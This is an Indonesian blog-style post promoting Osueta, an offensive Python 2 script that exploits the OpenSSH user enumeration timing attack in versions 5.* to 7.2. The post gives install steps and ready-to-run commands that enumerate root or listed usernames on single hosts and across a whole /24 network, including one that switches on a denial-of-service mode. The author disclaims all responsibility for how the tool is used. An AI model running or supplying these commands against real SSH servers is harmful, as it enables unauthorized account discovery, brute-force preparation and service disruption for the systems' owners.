Osueta: Skrip Python sederhana untuk mengeksploitasi Serangan Waktu Enumerasi Pengguna OpenSSH

  • Whatsapp
Osueta: Skrip Python sederhana untuk mengeksploitasi Serangan Waktu Enumerasi Pengguna OpenSSH


Tentang Osueta?
Osueta ini adalah skrip Python 2 sederhana untuk mengeksploitasi OpenSSH User Enumeration Timing Attack, hadir dalam OpenSSH versi <= 7.2 dan >= 5.*. Script memiliki kemampuan untuk membuat variasi nama pengguna yang digunakan dalam serangan bruteforce, dan kemungkinan untuk menetapkan kondisi DoS di server OpenSSH.

    Baca lebih banyak: Serangan Berbasis Waktu Enumerasi Pengguna OpenSSH

Bug telah diperbaiki di OpenSSH versi 7.3.

   Penulis Osueta:

Instalasi Osueta
Untuk pengguna Linux, buka Terminal Anda dan masukkan perintah ini:
Jika Anda pengguna Windows, ikuti langkah-langkah berikut:

Bacaan Lainnya

  • Instal Python 2.7.x dari Python.org pertama. Di Instal Pengaturan Python 2.7.x, pilih Tambahkan python.exe ke Path.
  • Unduh File zip master-Osueta.
  • Kemudian buka ritsletingnya.
  • Buka jendela CMD atau PowerShell di folder Osueta yang baru saja Anda buka ritsletingnya dan masukkan perintah ini:
    pip install python-nmap paramiko IPy
    python osueta.py -h


Nasihat: Seperti alat ofensif lainnya, penulis melepaskan semua tanggung jawab dalam penggunaan skrip ini.

Menu bantuan Osueta:


Contoh Osueta:
Upaya enumerasi pengguna tunggal dengan variasi nama pengguna:
python2 osueta.py -H 192.168.1.6 -p 22 -U root -d 30 -v yes


Upaya enumerasi pengguna tunggal tanpa variasi pengguna serangan DoS:
python2 osueta.py -H 192.168.1.6 -p 22 -U root -d 30 -v no --dos yes


Memindai jaringan kelas C dengan hanya satu pengguna:
python2 osueta.py -H 192.168.1.0/24 -p 22 -U root -v no 


Memindai jaringan kelas C dengan nama pengguna dari file, waktu tunda 15 detik dan kata sandi 50000 karakter:
python2 osueta.py -H 192.168.1.0/24 -p 22 -L usernames.txt -v yes -d 15 -l 50


Pos terkait

Tinggalkan Balasan

Alamat email Anda tidak akan dipublikasikan. Ruas yang wajib ditandai *